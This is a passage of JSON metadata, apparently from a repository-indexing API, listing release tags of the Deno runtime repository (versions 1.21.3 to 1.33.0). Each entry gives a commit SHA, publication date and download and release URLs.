url":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts